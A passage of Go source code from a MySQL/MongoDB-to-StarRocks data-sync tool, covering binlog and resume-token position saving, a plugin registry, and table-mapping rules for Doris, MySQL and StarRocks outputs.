errors.Trace(err) 97 | } 98 | 99 | func (pos *MongoPosition) ModifyPosition(v string) error { 100 | pos.Lock() 101 | defer pos.Unlock() 102 | if v == "" { 103 | return errors.Errorf("empty value") 104 | } 105 | pos.ResumeTokens.Data = v 106 | return nil 107 | } 108 | 109 | func (pos *MongoPosition) StartPosition() { 110 | if pos.ResumeTokens.Data == "" { 111 | log.Fatal("start position failed: empty value resumeTokens value") 112 | } 113 | 114 | pos.wg.Add(1) 115 | go func() { 116 | defer pos.wg.Done() 117 | ticker := time.NewTicker(time.Second * 3) 118 | defer ticker.Stop() 119 | 120 | for { 121 | select { 122 | case <-ticker.C: 123 | if err := pos.SavePosition(); err != nil { 124 | log.Fatalf("position save failed: %v", errors.ErrorStack(err)) 125 | } 126 | case <-pos.ctx.Done(): 127 | if err := pos.SavePosition(); err != nil { 128 | log.Fatalf("last position save failed: %v", errors.ErrorStack(err)) 129 | } 130 | log.Infof("last position save successfully. position: %v", pos.resumeTokenTimestamp()) 131 | return 132 | } 133 | } 134 | }() 135 | } 136 | 137 | func (pos *MongoPosition) Close() { 138 | pos.cancel() 139 | pos.wg.Wait() 140 | log.Infof("close mongo save position ticker goroutine.") 141 | } 142 | 143 | func (pos *MongoPosition) resumeTokenTimestamp() uint64 { 144 | i, err := strconv.ParseUint(pos.ResumeTokens.Data[2:18], 16, 64) 145 | if err != nil { 146 | log.Errorf("resumeToken parsing timestamp err %v", err) 147 | } 148 | return i >> 32 149 | 150 | } 151 | -------------------------------------------------------------------------------- /pkg/position/pos_mysql.go: -------------------------------------------------------------------------------- 1 | package position 2 | 3 | import ( 4 | "context" 5 | "encoding/json" 6 | "fmt" 7 | "github.com/BurntSushi/toml" 8 | "github.com/go-mysql-org/go-mysql/client" 9 | "github.com/go-mysql-org/go-mysql/mysql" 10 | "github.com/juju/errors" 11 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 12 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 13 | "github.com/mitchellh/mapstructure" 14 | "github.com/siddontang/go-log/log" 15 | "sync" 16 | "time" 17 | ) 18 | 19 | type MysqlBasePosition struct { 20 | BinlogName string `toml:"binlog-name" json:"binlog-name"` 21 | BinlogPos uint32 `toml:"binlog-pos" json:"binlog-pos"` 22 | BinlogGTID string `toml:"binlog-gtid" json:"binlog-gtid"` 23 | } 24 | type MysqlPosition struct { 25 | sync.RWMutex 26 | *MysqlBasePosition 27 | FilePath string 28 | Name string 29 | lastSaveTime time.Time 30 | connLock sync.Mutex 31 | conn *client.Conn 32 | wg sync.WaitGroup 33 | ctx context.Context 34 | cancel context.CancelFunc 35 | } 36 | 37 | const MysqlPosName = "mysql" 38 | 39 | func init() { 40 | registry.RegisterPlugin(registry.InputPositionPlugin, MysqlPosName, &MysqlPosition{}) 41 | } 42 | 43 | func (pos *MysqlPosition) Configure(pipelineName string, configInput map[string]interface{}) error { 44 | return nil 45 | } 46 | 47 | func (pos *MysqlPosition) LoadPosition(conf *config.BaseConfig) string { 48 | var err error 49 | pos.ctx, pos.cancel = context.WithCancel(context.Background()) 50 | // load pos info from db 51 | // init db 52 | 53 | meta, ok := conf.InputConfig.Config["meta"] 54 | mc := &config.MysqlConfig{} 55 | if ok { 56 | if err = mapstructure.Decode(meta, mc); err != nil { 57 | log.Fatal("input config parsing failed. err: ", err.Error()) 58 | } 59 | } else { 60 | meta = &config.MysqlConfig{} 61 | if err = mapstructure.Decode(conf.InputConfig.Config["source"], mc); err != nil { 62 | log.Fatal("input config parsing failed. err: ", err.Error()) 63 | } 64 | // if meta is nil, init meta = source 65 | conf.InputConfig.Config["meta"] = conf.InputConfig.Config["source"] 66 | } 67 | 68 | pos.Name = conf.Name 69 | 70 | // init conn 71 | pos.conn, err = client.Connect( 72 | fmt.Sprintf("%s:%d", mc.Host, mc.Port), 73 | mc.UserName, mc.Password, "", 74 | func(c *client.Conn) { _ = c.SetCharset("utf8") }) 75 | if err != nil { 76 | log.Fatal("input config conn failed. err: ", err.Error()) 77 | } 78 | 79 | // init database 80 | pos.initDb() 81 | 82 | basePos := &MysqlBasePosition{} 83 | queryPosSql := fmt.Sprintf("select `position` from `%s`.`positions` where `name` = '%s'", DbName, conf.Name) 84 | r, err := pos.executeSQL(queryPosSql) 85 | if err != nil { 86 | log.Fatal("query `position` table failed. err: ", err.Error()) 87 | } 88 | position, err := r.GetString(0, 0) 89 | if err != nil { 90 | log.Fatalf("`position` data get failed. err: %v", err.Error()) 91 | } 92 | err = json.Unmarshal([]byte(position), basePos) 93 | if err != nil { 94 | log.Fatalf("`position` data parsing failed. err: %v", err.Error()) 95 | } 96 | 97 | pos.MysqlBasePosition = basePos 98 | 99 | if pos.BinlogGTID != "" { 100 | return pos.BinlogGTID 101 | } 102 | 103 | // from local pos.info load 104 | positionFilePath := GetPositionFilePath(conf) 105 | initFilePositionData := "binlog-name = \"\"\nbinlog-pos = 0\nbinlog-gtid = \"\"" 106 | FindPositionFileNotCreate(positionFilePath, initFilePositionData) 107 | if _, err = toml.DecodeFile(positionFilePath, basePos); err != nil { 108 | log.Fatal(err) 109 | } 110 | if basePos.BinlogGTID != "" { 111 | // update db position from local pos.info 112 | marshal, err := json.Marshal(basePos) 113 | if err != nil { 114 | log.Fatal("init position data failed. err: ", err.Error()) 115 | } 116 | updPosSql := fmt.Sprintf("update `%s`.`positions` "+ 117 | "set `position` = '%s' where `name` = '%s'", DbName, string(marshal), conf.Name) 118 | _, err = pos.executeSQL(updPosSql) 119 | if err != nil { 120 | log.Fatal("update `position` table failed. err: ", err.Error()) 121 | } 122 | pos.MysqlBasePosition = basePos 123 | pos.FilePath = positionFilePath 124 | return pos.BinlogGTID 125 | } 126 | 127 | // if binlogGTID is "", load config start-position 128 | if conf.InputConfig.StartPosition != "" { 129 | pos.BinlogGTID = conf.InputConfig.StartPosition 130 | } 131 | return pos.BinlogGTID 132 | } 133 | 134 | func (pos *MysqlPosition) initDb() { 135 | r, err := pos.executeSQL("select"+ 136 | " 1 from information_schema.SCHEMATA where SCHEMA_NAME = ?", DbName) 137 | if err != nil { 138 | log.Fatalf("init position db `_go_mysql_sr` failed. err: %v", err.Error()) 139 | } 140 | 141 | if r.RowNumber() == 0 { 142 | createSql := fmt.Sprintf( 143 | "CREATE "+ 144 | "DATABASE IF NOT EXISTS `%s` DEFAULT CHARACTER SET utf8mb4", DbName) 145 | _, err = pos.executeSQL(createSql) 146 | if err != nil { 147 | log.Fatalf("init position db `_go_mysql_sr` failed. err: %v", err.Error()) 148 | } 149 | } 150 | 151 | r, err = pos.executeSQL("select 1 from "+ 152 | "information_schema.tables where table_schema = ? and table_name = ?", DbName, "positions") 153 | if err != nil { 154 | log.Fatalf("query table failed. err: %v", err.Error()) 155 | } 156 | 157 | if r.RowNumber() == 0 { 158 | posTaSql := fmt.Sprintf( 159 | "CREATE TABLE IF NOT EXISTS "+ 160 | "`%s`.`positions` ("+ 161 | "`id` int(11) NOT NULL AUTO_INCREMENT,"+ 162 | "`name` varchar(255) NOT NULL,"+ 163 | "`position` text,"+ 164 | "`created_at` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,"+ 165 | "`updated_at` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,"+ 166 | "PRIMARY KEY (`id`),"+ 167 | "UNIQUE KEY `name` (`name`)"+ 168 | ")", DbName) 169 | _, err = pos.executeSQL(posTaSql) 170 | if err != nil { 171 | log.Fatalf("query table failed. err: %v", err.Error()) 172 | } 173 | } 174 | 175 | // init table table_checkpoints table_increment_ddl 176 | r, err = pos.executeSQL("select 1 from "+ 177 | "information_schema.tables where table_schema = ? and table_name = ?", DbName, "table_checkpoints") 178 | if err != nil { 179 | log.Fatalf("query table failed. err: %v", err.Error()) 180 | } 181 | 182 | if r.RowNumber() == 0 { 183 | tcTaSql := fmt.Sprintf("CREATE TABLE IF NOT EXISTS "+ 184 | "`%s`.`table_checkpoints` ("+ 185 | "`id` int(11) NOT NULL AUTO_INCREMENT,"+ 186 | "`pos_id` int(11) NOT NULL,"+ 187 | "`tables_meta` mediumtext,"+ 188 | "`created_at` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,"+ 189 | "`updated_at` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,"+ 190 | "PRIMARY KEY (`id`))", DbName) 191 | _, err = pos.executeSQL(tcTaSql) 192 | if err != nil { 193 | log.Fatal("init `table_checkpoints` table failed. err: ", err.Error()) 194 | } 195 | } 196 | 197 | r, err = pos.executeSQL("select 1 from "+ 198 | "information_schema.tables where table_schema = ? and table_name = ?", DbName, "table_increment_ddl") 199 | if err != nil { 200 | log.Fatalf("init position db `_go_mysql_sr` failed. err: %v", err.Error()) 201 | } 202 | 203 | if r.RowNumber() == 0 { 204 | tidTaSql := fmt.Sprintf("CREATE TABLE IF NOT EXISTS "+ 205 | "`%s`.`table_increment_ddl` ("+ 206 | "`id` int(11) NOT NULL AUTO_INCREMENT,"+ 207 | "`pos_id` int(11) NOT NULL,"+ 208 | "`db` varchar(50) NOT NULL,"+ 209 | "`table_name` varchar(255) DEFAULT NULL COMMENT '',"+ 210 | "`table_ddl` text,"+ 211 | "`ddl_pos` varchar(500),"+ 212 | "`serial_number` int UNSIGNED not null DEFAULT '0' comment '',"+ 213 | "`created_at` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,"+ 214 | "`updated_at` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,"+ 215 | "PRIMARY KEY (`id`),"+ 216 | "UNIQUE KEY `uk_posid_ddlpos_serialnumber` (`pos_id`,`ddl_pos`,`serial_number`))", DbName) 217 | _, err = pos.executeSQL(tidTaSql) 218 | if err != nil { 219 | log.Fatal("init `table_increment_ddl` table failed. err: ", err.Error()) 220 | } 221 | } 222 | 223 | initPositionData := MysqlBasePosition{BinlogName: "", BinlogPos: 0, BinlogGTID: ""} 224 | marshal, err := json.Marshal(initPositionData) 225 | if err != nil { 226 | log.Fatal("init position data failed. err: ", err.Error()) 227 | } 228 | posDataSql := fmt.Sprintf( 229 | "insert "+ 230 | "ignore into `%s`.`positions`"+ 231 | "(name, position)values('%s', '%v')", DbName, pos.Name, string(marshal)) 232 | _, err = pos.executeSQL(posDataSql) 233 | if err != nil { 234 | log.Fatal("init `position` table failed. err: ", err.Error()) 235 | } 236 | } 237 | 238 | func (pos *MysqlPosition) SavePosition() error { 239 | pos.Lock() 240 | defer pos.Unlock() 241 | 242 | n := time.Now() 243 | if n.Sub(pos.lastSaveTime) < time.Second { 244 | return nil 245 | } 246 | pos.lastSaveTime = n 247 | 248 | // save pos to db 249 | marshal, err := json.Marshal(pos.MysqlBasePosition) 250 | if err != nil { 251 | log.Fatalf("`position` data parsing failed. err: %v", err.Error()) 252 | } 253 | saveSql := fmt.Sprintf("update `%s`.`positions` "+ 254 | "set `position` = '%s' where `name` = '%s'", DbName, string(marshal), pos.Name) 255 | _, err = pos.executeSQL(saveSql) 256 | if err != nil { 257 | log.Errorf("canal save position to db %s.%s err %v", DbName, pos.Name, err) 258 | } 259 | log.Debugf("save canal sync position gtid: %s", pos.BinlogGTID) 260 | 261 | return errors.Trace(err) 262 | } 263 | 264 | func (pos *MysqlPosition) ModifyPosition(v string) error { 265 | pos.Lock() 266 | defer pos.Unlock() 267 | if v == "" { 268 | return errors.Errorf("empty value") 269 | } 270 | pos.BinlogGTID = v 271 | return nil 272 | } 273 | 274 | func (pos *MysqlPosition) StartPosition() { 275 | if pos.BinlogGTID == "" { 276 | log.Fatal("start position failed: empty value binlog gtid value") 277 | } 278 | 279 | pos.wg.Add(1) 280 | go func() { 281 | defer pos.wg.Done() 282 | ticker := time.NewTicker(time.Second * 3) 283 | defer ticker.Stop() 284 | 285 | for { 286 | select { 287 | case <-ticker.C: 288 | if err := pos.SavePosition(); err != nil { 289 | log.Fatalf("position save failed: %v", errors.ErrorStack(err)) 290 | } 291 | case <-pos.ctx.Done(): 292 | if err := pos.SavePosition(); err != nil { 293 | log.Fatalf("last position save failed: %v", errors.ErrorStack(err)) 294 | } 295 | log.Infof("last position save successfully. position: %v", pos.BinlogGTID) 296 | return 297 | } 298 | } 299 | }() 300 | } 301 | 302 | func (pos *MysqlPosition) Close() { 303 | pos.cancel() 304 | pos.wg.Wait() 305 | if pos.conn != nil { 306 | err := pos.conn.Close() 307 | if err != nil { 308 | log.Warnf("close mysql save position conn failed. err: %v", err.Error()) 309 | } 310 | } 311 | log.Infof("close mysql save position ticker goroutine.") 312 | } 313 | 314 | func (pos *MysqlPosition) executeSQL(cmd string, args ...interface{}) (rr *mysql.Result, err error) { 315 | pos.connLock.Lock() 316 | defer pos.connLock.Unlock() 317 | rr, err = pos.conn.Execute(cmd, args...) 318 | if err != nil && !mysql.ErrorEqual(err, mysql.ErrBadConn) { 319 | return 320 | } else if mysql.ErrorEqual(err, mysql.ErrBadConn) { 321 | err = pos.conn.Close() 322 | if err != nil { 323 | return nil, err 324 | } 325 | pos.conn = nil 326 | } else { 327 | return 328 | } 329 | return 330 | } 331 | -------------------------------------------------------------------------------- /pkg/position/utils.go: -------------------------------------------------------------------------------- 1 | package position 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 5 | "github.com/siddontang/go-log/log" 6 | "os" 7 | "strings" 8 | ) 9 | 10 | var DbName = "_go_mysql_sr" 11 | 12 | func GetPositionFilePath(conf *config.BaseConfig) string { 13 | splits := strings.SplitAfter(*conf.FileName, "/") 14 | lastIndex := len(splits) - 1 15 | splits[lastIndex] = "_" + conf.Name + "-pos.info" 16 | positionFileName := strings.Join(splits, "") 17 | return positionFileName 18 | } 19 | 20 | func FindPositionFileNotCreate(filePath string, initPositionData string) { 21 | if _, err := os.Stat(filePath); err == nil { 22 | return 23 | } 24 | f, err := os.OpenFile(filePath, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0600) 25 | defer func(f *os.File) { 26 | if f == nil { 27 | return 28 | } 29 | if err := f.Close(); err != nil { 30 | log.Fatalf("file close failed. err: ", err.Error()) 31 | } 32 | }(f) 33 | if err != nil { 34 | log.Fatal(err) 35 | } else { 36 | _, err = f.Write([]byte(initPositionData)) 37 | if err != nil { 38 | log.Fatal(err) 39 | } 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /pkg/registry/registry.go: -------------------------------------------------------------------------------- 1 | package registry 2 | 3 | import ( 4 | "fmt" 5 | "github.com/juju/errors" 6 | "github.com/siddontang/go-log/log" 7 | "sync" 8 | ) 9 | 10 | type PluginType string 11 | 12 | const ( 13 | InputPlugin PluginType = "input" 14 | InputPositionPlugin PluginType = "inputPosition" 15 | InputSchemaPlugin PluginType = "inputSchema" 16 | OutputPlugin PluginType = "output" 17 | OutputRulePlugin PluginType = "outputRule" 18 | ) 19 | 20 | type Plugin interface { 21 | Configure(pipelineName string, data map[string]interface{}) error 22 | } 23 | 24 | var registry map[PluginType]map[string]Plugin 25 | var mutex sync.Mutex 26 | 27 | func init() { 28 | registry = make(map[PluginType]map[string]Plugin) 29 | } 30 | 31 | func RegisterPlugin(pluginType PluginType, name string, v Plugin) { 32 | mutex.Lock() 33 | defer mutex.Unlock() 34 | 35 | log.Debugf("[RegisterPlugin] type: %v, name: %v", pluginType, name) 36 | 37 | _, ok := registry[pluginType] 38 | if !ok { 39 | registry[pluginType] = make(map[string]Plugin) 40 | } 41 | 42 | _, ok = registry[pluginType][name] 43 | if ok { 44 | panic(fmt.Sprintf("plugin already exists, type: %v, name: %v", pluginType, name)) 45 | } 46 | registry[pluginType][name] = v 47 | } 48 | 49 | func GetPlugin(pluginType PluginType, name string) (Plugin, error) { 50 | mutex.Lock() 51 | defer mutex.Unlock() 52 | 53 | if registry == nil { 54 | return nil, errors.Errorf("empty registry") 55 | } 56 | 57 | plugins, ok := registry[pluginType] 58 | if !ok { 59 | return nil, errors.Errorf("empty plugin type: %v, name: %v", pluginType, name) 60 | } 61 | p, ok := plugins[name] 62 | if !ok { 63 | return nil, errors.Errorf("empty plugin, type: %v, name: %v", pluginType, name) 64 | } 65 | return p, nil 66 | } 67 | -------------------------------------------------------------------------------- /pkg/rule/rule_doris.go: -------------------------------------------------------------------------------- 1 | package rule 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 5 | "github.com/mitchellh/mapstructure" 6 | "github.com/siddontang/go-log/log" 7 | ) 8 | 9 | type DorisRules struct { 10 | Rules []*DorisRule 11 | RulesRegex []string 12 | RulesMap map[string]interface{} 13 | } 14 | 15 | type DorisRule struct { 16 | SourceSchema string `toml:"source-schema" json:"source-schema" mapstructure:"source-schema"` 17 | SourceTable string `toml:"source-table" json:"source-table" mapstructure:"source-table"` 18 | TargetSchema string `toml:"target-schema" json:"target-schema" mapstructure:"target-schema"` 19 | TargetTable string `toml:"target-table" json:"target-table" mapstructure:"target-table"` 20 | RuleType RuleType `default:"init" json:"rule-type"` // default: init, init、dynamic add 21 | // for api delete rule, only logical deleted, fix output get ruleMap failed problem. when add the same rule physical deleted 22 | Deleted bool `default:"false" json:"deleted"` 23 | } 24 | 25 | const DorisRuleName = "doris" 26 | 27 | func init() { 28 | registry.RegisterPlugin(registry.OutputRulePlugin, DorisRuleName, &DorisRules{}) 29 | } 30 | 31 | func (drs *DorisRules) Configure(pipelineName string, configOutput map[string]interface{}) error { 32 | configRules := configOutput["rule"] 33 | err := mapstructure.Decode(configRules, &drs.Rules) 34 | if err != nil { 35 | log.Fatal("output.config.rule config parsing failed. err: ", err.Error()) 36 | } 37 | // init 38 | for i := range drs.Rules { 39 | drs.Rules[i].RuleType = TypeInit 40 | drs.Rules[i].Deleted = false 41 | } 42 | drs.RuleToRegex() 43 | drs.RuleToMap() 44 | return nil 45 | } 46 | 47 | func (drs *DorisRules) NewRule(config map[string]interface{}) { 48 | configRules := config["rule"] 49 | err := mapstructure.Decode(configRules, &drs.Rules) 50 | if err != nil { 51 | log.Fatal("output.config.rule config parsing failed. err: ", err.Error()) 52 | } 53 | // init 54 | for i := range drs.Rules { 55 | drs.Rules[i].RuleType = TypeInit 56 | drs.Rules[i].Deleted = false 57 | } 58 | drs.RuleToRegex() 59 | drs.RuleToMap() 60 | } 61 | 62 | func (drs *DorisRules) RuleToRegex() { 63 | if len(drs.Rules) == 0 { 64 | log.Fatal("rule config cannot be empty") 65 | } 66 | for _, r := range drs.Rules { 67 | // cfg.IncludeTableRegex[0] = "test\\..*" 68 | drs.RulesRegex = append(drs.RulesRegex, SchemaTableToStrRegex(r.SourceSchema, r.SourceTable)) 69 | } 70 | } 71 | 72 | func (drs *DorisRules) RuleToMap() { 73 | if len(drs.Rules) == 0 { 74 | log.Fatal("rule config cannot be empty") 75 | } 76 | drs.RulesMap = make(map[string]interface{}) 77 | for _, r := range drs.Rules { 78 | drs.RulesMap[RuleKeyFormat(r.SourceSchema, r.SourceTable)] = r 79 | } 80 | } 81 | 82 | func (drs *DorisRules) GetRuleToRegex() []string { 83 | return drs.RulesRegex 84 | } 85 | 86 | func (drs *DorisRules) GetRuleToMap() map[string]interface{} { 87 | return drs.RulesMap 88 | } 89 | 90 | func (drs *DorisRules) GetRule(schemaTable string) interface{} { 91 | v, ok := drs.RulesMap[schemaTable] 92 | if ok { 93 | return v 94 | } 95 | log.Fatalf("get rule failed. target rule for %v not find.", schemaTable) 96 | return nil 97 | } 98 | 99 | func (drs *DorisRules) TargetString() string { 100 | return "" 101 | } 102 | -------------------------------------------------------------------------------- /pkg/rule/rule_mysql.go: -------------------------------------------------------------------------------- 1 | package rule 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 5 | "github.com/mitchellh/mapstructure" 6 | "github.com/siddontang/go-log/log" 7 | ) 8 | 9 | type MysqlRules struct { 10 | Rules []*MysqlRule 11 | RulesRegex []string 12 | RulesMap map[string]interface{} 13 | } 14 | 15 | type MysqlRule struct { 16 | SourceSchema string `toml:"source-schema" json:"source-schema" mapstructure:"source-schema"` 17 | SourceTable string `toml:"source-table" json:"source-table" mapstructure:"source-table"` 18 | TargetSchema string `toml:"target-schema" json:"target-schema" mapstructure:"target-schema"` 19 | TargetTable string `toml:"target-table" json:"target-table" mapstructure:"target-table"` 20 | PrimaryKeys []string `toml:"primary-keys" json:"primary-keys" mapstructure:"primary-keys"` 21 | SourceColumns []string `toml:"source-columns" json:"source-columns" mapstructure:"source-columns"` 22 | TargetColumns []string `toml:"target-columns" json:"target-columns" mapstructure:"target-columns"` 23 | RuleType RuleType `default:"init" json:"rule-type"` // default: init, init、dynamic add 24 | // for api delete rule, only logical deleted, fix output get ruleMap failed problem. when add the same rule physical deleted 25 | Deleted bool `default:"false" json:"deleted"` 26 | } 27 | 28 | const MysqlRuleName = "mysql" 29 | 30 | func init() { 31 | registry.RegisterPlugin(registry.OutputRulePlugin, MysqlRuleName, &MysqlRules{}) 32 | } 33 | 34 | func (mrs *MysqlRules) Configure(pipelineName string, configOutput map[string]interface{}) error { 35 | configRules := configOutput["rule"] 36 | err := mapstructure.Decode(configRules, &mrs.Rules) 37 | if err != nil { 38 | log.Fatal("output.config.rule config parsing failed. err: ", err.Error()) 39 | } 40 | // init 41 | for i := range mrs.Rules { 42 | mrs.Rules[i].RuleType = TypeInit 43 | mrs.Rules[i].Deleted = false 44 | } 45 | mrs.RuleToRegex() 46 | mrs.RuleToMap() 47 | return nil 48 | } 49 | 50 | func (mrs *MysqlRules) NewRule(config map[string]interface{}) { 51 | configRules := config["rule"] 52 | err := mapstructure.Decode(configRules, &mrs.Rules) 53 | if err != nil { 54 | log.Fatal("output.config.rule config parsing failed. err: ", err.Error()) 55 | } 56 | // init 57 | for i := range mrs.Rules { 58 | mrs.Rules[i].RuleType = TypeInit 59 | mrs.Rules[i].Deleted = false 60 | } 61 | mrs.RuleToRegex() 62 | mrs.RuleToMap() 63 | } 64 | 65 | func (mrs *MysqlRules) RuleToRegex() { 66 | if len(mrs.Rules) == 0 { 67 | log.Fatal("rule config cannot be empty") 68 | } 69 | for _, r := range mrs.Rules { 70 | // cfg.IncludeTableRegex[0] = "test\\..*" 71 | mrs.RulesRegex = append(mrs.RulesRegex, SchemaTableToStrRegex(r.SourceSchema, r.SourceTable)) 72 | } 73 | } 74 | 75 | func (mrs *MysqlRules) RuleToMap() { 76 | if len(mrs.Rules) == 0 { 77 | log.Fatal("rule config cannot be empty") 78 | } 79 | mrs.RulesMap = make(map[string]interface{}) 80 | for _, r := range mrs.Rules { 81 | mrs.RulesMap[RuleKeyFormat(r.SourceSchema, r.SourceTable)] = r 82 | } 83 | } 84 | 85 | func (mrs *MysqlRules) GetRuleToRegex() []string { 86 | return mrs.RulesRegex 87 | } 88 | 89 | func (mrs *MysqlRules) GetRuleToMap() map[string]interface{} { 90 | return mrs.RulesMap 91 | } 92 | 93 | func (mrs *MysqlRules) GetRule(schemaTable string) interface{} { 94 | v, ok := mrs.RulesMap[schemaTable] 95 | if ok { 96 | return v 97 | } 98 | log.Fatalf("get rule failed. target rule for %v not find.", schemaTable) 99 | return nil 100 | } 101 | 102 | func (mrs *MysqlRules) TargetString() string { 103 | return "" 104 | } 105 | -------------------------------------------------------------------------------- /pkg/rule/rule_starrocks.go: -------------------------------------------------------------------------------- 1 | package rule 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 5 | "github.com/mitchellh/mapstructure" 6 | "github.com/siddontang/go-log/log" 7 | ) 8 | 9 | type StarrocksRules struct { 10 | Rules []*StarrocksRule 11 | RulesRegex []string 12 | RulesMap map[string]interface{} 13 | } 14 | 15 | type StarrocksRule struct { 16 | SourceSchema string `toml:"source-schema" json:"source-schema" mapstructure:"source-schema"` 17 | SourceTable string `toml:"source-table" json:"source-table" mapstructure:"source-table"` 18 | TargetSchema string `toml:"target-schema" json:"target-schema" mapstructure:"target-schema"` 19 | TargetTable string `toml:"target-table" json:"target-table" mapstructure:"target-table"` 20 | RuleType RuleType `default:"init" json:"rule-type"` // init、dynamic add 21 | // for api delete rule, only logical deleted, fix output get ruleMap failed problem. when add the same rule physical deleted 22 | Deleted bool `default:"false" json:"deleted"` 23 | } 24 | 25 | const StarrocksRuleName = "starrocks" 26 | 27 | func init() { 28 | registry.RegisterPlugin(registry.OutputRulePlugin, StarrocksRuleName, &StarrocksRules{}) 29 | } 30 | 31 | func (srs *StarrocksRules) Configure(pipelineName string, configOutput map[string]interface{}) error { 32 | configRules := configOutput["rule"] 33 | err := mapstructure.Decode(configRules, &srs.Rules) 34 | if err != nil { 35 | log.Fatal("output.config.rule config parsing failed. err: ", err.Error()) 36 | } 37 | // init 38 | for i := range srs.Rules { 39 | srs.Rules[i].RuleType = TypeInit 40 | srs.Rules[i].Deleted = false 41 | } 42 | srs.RuleToRegex() 43 | srs.RuleToMap() 44 | return nil 45 | } 46 | 47 | func (srs *StarrocksRules) NewRule(config map[string]interface{}) { 48 | configRules := config["rule"] 49 | err := mapstructure.Decode(configRules, &srs.Rules) 50 | if err != nil { 51 | log.Fatal("output.config.rule config parsing failed. err: ", err.Error()) 52 | } 53 | // init 54 | for i := range srs.Rules { 55 | srs.Rules[i].RuleType = TypeInit 56 | srs.Rules[i].Deleted = false 57 | } 58 | srs.RuleToRegex() 59 | srs.RuleToMap() 60 | } 61 | 62 | func (srs *StarrocksRules) RuleToRegex() { 63 | if len(srs.Rules) == 0 { 64 | log.Fatal("rule config cannot be empty") 65 | } 66 | for _, r := range srs.Rules { 67 | srs.RulesRegex = append(srs.RulesRegex, SchemaTableToStrRegex(r.SourceSchema, r.SourceTable)) 68 | } 69 | } 70 | 71 | func (srs *StarrocksRules) RuleToMap() { 72 | if len(srs.Rules) == 0 { 73 | log.Fatal("rule config cannot be empty") 74 | } 75 | srs.RulesMap = make(map[string]interface{}) 76 | for _, r := range srs.Rules { 77 | srs.RulesMap[RuleKeyFormat(r.SourceSchema, r.SourceTable)] = r 78 | } 79 | } 80 | 81 | func (srs *StarrocksRules) GetRuleToRegex() []string { 82 | return srs.RulesRegex 83 | } 84 | 85 | func (srs *StarrocksRules) GetRuleToMap() map[string]interface{} { 86 | return srs.RulesMap 87 | } 88 | 89 | func (srs *StarrocksRules) GetRule(schemaTable string) interface{} { 90 | v, ok := srs.RulesMap[schemaTable] 91 | if ok { 92 | return v 93 | } 94 | log.Fatalf("get rule failed. target rule for %v not find.", schemaTable) 95 | return nil 96 | } 97 | 98 | func (srs *StarrocksRules) TargetString() string { 99 | return "" 100 | } 101 | -------------------------------------------------------------------------------- /pkg/rule/utils.go: -------------------------------------------------------------------------------- 1 | package rule 2 | 3 | import ( 4 | "errors" 5 | "fmt" 6 | "github.com/siddontang/go-log/log" 7 | "strings" 8 | ) 9 | 10 | type RuleType string 11 | 12 | const ( 13 | TypeInit RuleType = "init" 14 | TypeDynamicAdd RuleType = "dynamic add" 15 | ) 16 | 17 | func SchemaTableToStrRegex(schema string, table string) string { 18 | if schema == "" || table == "" { 19 | log.Fatal("rule cannot be empty") 20 | } 21 | // cfg.IncludeTableRegex[0] = "test\\..*" 22 | return "^" + schema + "\\." + table + "$" 23 | } 24 | 25 | func StrRegexToSchemaTable(regex string) (string, string) { 26 | if regex == "" { 27 | log.Fatal("regex cannot be empty") 28 | } 29 | tmpRegex := strings.ReplaceAll(regex, "^", "") 30 | tmpRegex = strings.ReplaceAll(tmpRegex, "$", "") 31 | tmpRegex = strings.ReplaceAll(tmpRegex, "\\", "") 32 | if strings.Index(tmpRegex, ".") == -1 { 33 | log.Fatalf("regex: %s delimiter '.' cannot be found.", regex) 34 | } 35 | splitRegex := strings.Split(tmpRegex, ".") 36 | return splitRegex[0], splitRegex[1] 37 | } 38 | 39 | func RuleKeyFormat(schema string, table string) string { 40 | return schema + ":" + table 41 | } 42 | 43 | func GetRuleKeySchemaTable(ruleKey string) (string, string, error) { 44 | if ruleKey == "" || !strings.Contains(ruleKey, ":") { 45 | return "", "", errors.New(fmt.Sprintf("rulekey:%s is invalid", ruleKey)) 46 | } 47 | schemaTable := strings.Split(ruleKey, ":") 48 | return schemaTable[0], schemaTable[1], nil 49 | } 50 | -------------------------------------------------------------------------------- /pkg/schema/sch_mongo.go: -------------------------------------------------------------------------------- 1 | package schema 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "github.com/juju/errors" 7 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 8 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 9 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 10 | "github.com/mitchellh/mapstructure" 11 | "github.com/siddontang/go-log/log" 12 | "go.mongodb.org/mongo-driver/mongo" 13 | "go.mongodb.org/mongo-driver/mongo/options" 14 | "reflect" 15 | "sync" 16 | "time" 17 | ) 18 | 19 | type MongoTables struct { 20 | *config.MongoConfig 21 | tablesLock sync.RWMutex 22 | tables map[string]*Table 23 | connLock sync.Mutex 24 | conn *mongo.Client 25 | ctx context.Context 26 | cancel context.CancelFunc 27 | } 28 | 29 | const MongoName = "mongo" 30 | 31 | func init() { 32 | registry.RegisterPlugin(registry.InputSchemaPlugin, MongoName, &MongoTables{}) 33 | } 34 | 35 | func (mts *MongoTables) Configure(pipelineName string, configInput map[string]interface{}) error { 36 | return nil 37 | } 38 | 39 | func (mts *MongoTables) NewSchemaTables(conf *config.BaseConfig, pluginConfig map[string]interface{}, startPos string, rulesMap map[string]interface{}) { 40 | mts.tables = make(map[string]*Table) 41 | mts.MongoConfig = &config.MongoConfig{} 42 | err := mapstructure.Decode(pluginConfig["source"], mts.MongoConfig) 43 | if err != nil { 44 | log.Fatal("new schema tables config parsing failed. err: %v", err.Error()) 45 | } 46 